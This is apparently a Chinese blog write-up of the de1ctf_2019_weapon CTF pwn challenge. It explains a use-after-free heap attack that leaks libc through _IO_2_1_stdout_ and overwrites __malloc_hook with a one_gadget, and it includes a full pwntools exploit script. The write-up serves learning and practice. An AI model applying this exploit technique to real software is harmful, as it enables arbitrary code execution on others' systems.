没做出来,wtcl,看了师傅们的wp才找到思路,收获了很多

怎么说呢,这个题很简单但是很巧妙,逆起来几乎无难度

漏洞点位于free函数,一个简单的UAF漏洞

然后接下来说说我一开始的思路

由于程序没有提供show函数,所以几乎可以确定要打_IO_2_1_stdout_,改掉flag然后泄漏libc

但是add函数里面只能申请小于0x60的chunk,根本找不到残留的unsorted bin留下的指针

然后,然后我就找不到思路了

然后学习了一波师傅们的wp

其实这个除了UAF还有一个小漏洞,就是可以自己申请index,可以申请0-9号的任意index

这就为我们伪造unsorted bin留下了条件

思路,要想拿到unsorted bin的指针,首先我们需要一个0x60的fastbin,然后在相同的位置需要一个unsorted bin,这样fastbin的fd pointer就留下了unsorted bin的fd pointer,就可以攻击_IO_2_1_stdout_了

然后就是常规的hack __malloc_hook

仔细记录一下中间过程

先来伪造一个header,目的:可以改下一个chunk的控制信息

 1 add(0x10,0,'aaaaaaaa')

 2 add(0x10,1,'bbbbbbbb')

 3 add(0x60,2,'cccccccc')

 4 add(0x10,3,'dddddddd')

 5

 6 free(0)

 7 free(1)

 8 free(0)

 9

10 add(0x10,0,p64(0) + p64(0x21))

11 add(0x60,8,'eeeeeeee')

12

13 edit(1,'\x10')

这样我们可以申请到010的位置,从而可以对020这个chunk的header 进行修改,可以先改成0x71,然后free一下,然后再改成一个unsorten bin大小的chunk,再free,这样就有了残留的堆指针

1 add(0x10,1,'aaaaaaaa')

2 add(0x10,4,p64(0) + p64(0x71))

3 edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0

4 free(1)

编辑2号chunk的目的是绕过free时的检查

接下来fast bin拿到unsorted bin的fd指针

1 edit(4,p64(0) + p64(0x91))    # to change the chunk size

2 free(1)    # now , fast fd has connected unsorted bin fd

然后就是常规思路了

申请到'\xdd\x*5'的位置,'*'需要爆破,1/16的概率,直接扔个try except

1 edit(1,'\xdd\x65')

2 edit(4,p64(0) + p64(0x71))    # don't forget to renew size

3 payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags

4 payload += p64(0) * 3 + '\x00' # make _IO_write_base smaller

5 add(0x60,5,'lemon')

6 add(0x60,6,payload

成功泄漏libc,后面就是常规的__malloc_hook - 0x23

 1 libc = ELF('./libc-2.23.so')

 2 _IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192

 3 libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']

 4 __malloc_hook = libc_base + libc.sym['__malloc_hook']

 5 one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]

 6 one_gadget = libc_base + one_gadget_list[3]

 7 print "[*] one_gadget:",hex(one_gadget)

 8 add(0x60,5,'lemon')

 9 free(5)

10 payload = 0x13 * 'a' + p64(one_gadget)

11 edit(5,p64(__malloc_hook - 0x23))

12 add(0x60,5,'\x10')

13 add(0x60,0,payload)

14 add(0x20,3,'hack')

15 gdb.attach(p)

16 p.interactive()

完整exp:

  1 from pwn import *

  2

  3 '''

  4 author: lemon

  5 date: 2020-10-16

  6 libc version: libc-2.23.so

  7 '''

  8

  9 local = 1

 10

 11 binary = "./de1ctf_2019_weapon"

 12

 13

 14 def dbg():

 15     context.log_level = 'debug'

 16

 17 context.terminal = ['tmux','splitw','-h']

 18

 19

 20 def add(size,index,content):

 21     p.sendlineafter('choice >> ','1')

 22     p.sendlineafter('wlecome input your size of weapon: ',str(size))

 23     p.sendlineafter('input index:',str(index))

 24     p.sendafter('input your name:',content)

 25

 26 def free(index):

 27     p.sendlineafter('choice >> ','2')

 28     p.sendlineafter('input idx :',str(index))

 29

 30 def edit(index,content):

 31     p.sendlineafter('choice >>','3')

 32     p.sendlineafter('input idx:',str(index))

 33     p.sendafter('new content:',content)

 34

 35 while True:

 36     try:

 37         if local == 1:

 38             p = process(binary)

 39         else:

 40             p = remote("node3.buuoj.cn",26759)

 41         add(0x10,0,'aaaaaaaa')

 42         add(0x10,1,'bbbbbbbb')

 43         add(0x60,2,'cccccccc')

 44         add(0x10,3,'dddddddd')

 45

 46         free(0)

 47         free(1)

 48         free(0)

 49

 50         add(0x10,0,p64(0) + p64(0x21))

 51         add(0x60,8,'eeeeeeee')

 52

 53         edit(1,'\x10')

 54

 55         add(0x10,1,'aaaaaaaa')

 56         add(0x10,4,p64(0) + p64(0x71))

 57

 58         edit(2,0x40 * 'a' + p64(0) + p64(0x71))    # bypass free check: the next chunk size cannot equal to 0

 59

 60         free(1)

 61

 62         edit(4,p64(0) + p64(0x91))    # to change the chunk size

 63         free(1)    # now , fast fd has connected unsorted bin fd

 64

 65         edit(1,'\xdd\x65')

 66         edit(4,p64(0) + p64(0x71))    # don't forget to renew size

 67

 68         payload = 3 * 'a' + p64(0) * 6 + p64(0xfbad1800)    # change flags

 69         payload += p64(0) * 3 + '\x00' # make _IO_write_base smaller

 70

 71         add(0x60,5,'lemon')

 72         add(0x60,6,payload)

 73

 74

 75         libc = ELF('./libc-2.23.so')

 76         _IO_2_1_stderr_ = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - 192

 77         libc_base = _IO_2_1_stderr_ - libc.sym['_IO_2_1_stderr_']

 78

 79         __malloc_hook = libc_base + libc.sym['__malloc_hook']

 80

 81         one_gadget_list = [0x45216,0x4526a,0xf02a4,0xf1147]

 82         one_gadget = libc_base + one_gadget_list[3]

 83         print "[*] one_gadget:",hex(one_gadget)

 84

 85         add(0x60,5,'lemon')

 86         free(5)

 87

 88         payload = 0x13 * 'a' + p64(one_gadget)

 89

 90         edit(5,p64(__malloc_hook - 0x23))

 91         add(0x60,5,'\x10')

 92         add(0x60,0,payload)

 93

 94         add(0x20,3,'hack')

 95

 96         gdb.attach(p)

 97         p.interactive()

 98         break

 99

100     except Exception as e:

101         print(e)

102         p.close()

103         continue

涨知识的一个pwn题:de1ctf_2019_weapon的更多相关文章

  1. pwn200,一道不完全考察ret2libc的小小pwn题

    pwn200 ---XDCTF-2015 每日一pwn,今天又做了一个pwn,那个pwn呢???攻防世界的进阶区里的一道小pwn题,虽然这个题考察的知识不多,rop链也比较好构建,但是还是让我又学到了 ...

  2. pwn 题GDB调试技巧和exp模板

    GDB分析ELF文件常用的调试技巧 gdb常用命令 首先是gbd+文件名 静态调试 ,gdb attach +文件名 动态调试 为了方便查看堆栈和寄存器 最好是安装peda插件 安装 可以通过pip直 ...

  3. 由一道CTF pwn题深入理解libc2.26中的tcache机制

    本文首发安全客:https://www.anquanke.com/post/id/104760 在刚结束的HITB-XCTF有一道pwn题gundam使用了2.26版本的libc.因为2.26版本中加 ...

  4. PWN题搭建

    0x00.准备题目 例如:level.c #include <stdio.h> #include <unistd.h> int main(){ char buffer[0x10 ...

  5. 第一解出的pwn题

    虽然题目不难,但是 是我第一次做出的pwn题,得写下. __int64 sub_4007E6() { char s1; // [sp+0h] [bp-30h]@1 memset(&s1, , ...

  6. pwn题命令行解题脚本

    目录 脚本说明 脚本内容 使用 使用示例 参考与引用 脚本说明 这是专门为本地调试与远程答题准备的脚本,依靠命令行参数进行控制. 本脚本支持的功能有: 本地调试 开启tmux调试 设置gdb断点,支持 ...

  7. 攻防世界pwn题:forgot

    0x00:查看文件信息 该文件是32位的,canary和PIE保护机制没开. 0x01:用IDA进行静态分析 总览: 该函数就是:v5初值为1,对v2输入一串字符.然后执行一个会根据输入的字符串而修改 ...

  8. HCTF2018 pwn题复现

    相关文件位置 https://gitee.com/hac425/blog_data/tree/master/hctf2018 the_end 程序功能为,首先 打印出 libc 的地址, 然后可以允许 ...

  9. 百度杯 十一月 的一道pwn题复现

    拿到题后,就直接开鲁.. /ctf/pwn# checksec pwnme [*] '/ctf/pwn/pwnme' Arch: amd64--little RELRO: Full RELRO Sta ...

随机推荐

  1. 使用Scrcpy实现电脑控制安卓手机

    很多时候我们想要在电脑上使用一些手机软件,使用模拟器当然是一种选择,但是这些模拟器要不然不免费,要不然广告多不放心.Scrcpy是一个开源免费的软件,通过abd命令实现了安卓手机投屏和控制功能,并且支 ...

  2. 面试官:一个 TCP 连接可以发多少个 HTTP 请求?

      曾经有这么一道面试题:从 URL 在浏览器被被输入到页面展现的过程中发生了什么? 相信大多数准备过的同学都能回答出来,但是如果继续问:收到的 HTML 如果包含几十个图片标签,这些图片是以什么方式 ...

  3. Swiper 在IE9 及其他浏览器使用

    Swiper 在IE9 及其他浏览器使用 前言 昨天遇到一个问题,swiper 使用版本是3.4.2 除了Ie9浏览器外其他浏览器都正常,IE9 无法轮播,执行控制台报错源码问题.没办法,只能降级兼容 ...

  4. 刷题[CISCN2019 总决赛 Day2 Web1]Easyweb

    解题思路 打开网页是这样一个登陆框,随机试了一下常见弱密钥,二次注入等.均是返回不同的猫咪图案 不同的id对应不同的猫咪图案.经测试,返回的id应该是无序,随机的.感觉这里有可能存在注入点,但是测试好 ...

  5. Java学习day01

    1.Java的种类: JavaSE(Java标准版) JavaEE(Java企业版) JavaME(Java微型版) 其中,JavaSE是基础,以后的方向是JavaEE(Java企业版) 2.什么是J ...

  6. 062 01 Android 零基础入门 01 Java基础语法 07 Java二维数组 01 二维数组应用

    062 01 Android 零基础入门 01 Java基础语法 07 Java二维数组 01 二维数组应用 本文知识点:二维数组应用 二维数组的声明和创建 ? 出现空指针异常 数组的名字指向数组的第 ...

  7. Python3基础——递归

    递归函数 如果一个函数在内部调用自身本身,这个函数就是递归函数. 递归函数的优点是定义简单,逻辑清晰.理论上,所有的递归函数都可以写成循环的方式,但循环的逻辑不如递归清晰. 使用递归函数需要注意防止栈 ...

  8. matlab中exist 检查变量、脚本、函数、文件夹或类的存在情况

    参考: 1.https://ww2.mathworks.cn/help/matlab/ref/exist.html?searchHighlight=exist&s_tid=doc_srchti ...

  9. DX12龙书 01 - 向量在几何学和数学中的表示以及运算定义

    0x00 向量 向量 ( vector ) 是一种兼具大小 ( magnitude ) 和方向的量. 0x01 几何表示 几何方法中用一条有向线段来表示一个向量,其中,线段长度代表向量的模,箭头的指向 ...

  10. ansible-playbook流程控制-when条件判断

    1. ansible-playbook添加判断     when相当于shell脚本里的if 判断,when语句就是用来实现这个功能的,它是一个jinja2的语法,但是不需要双大括号,用法很简单  1 ...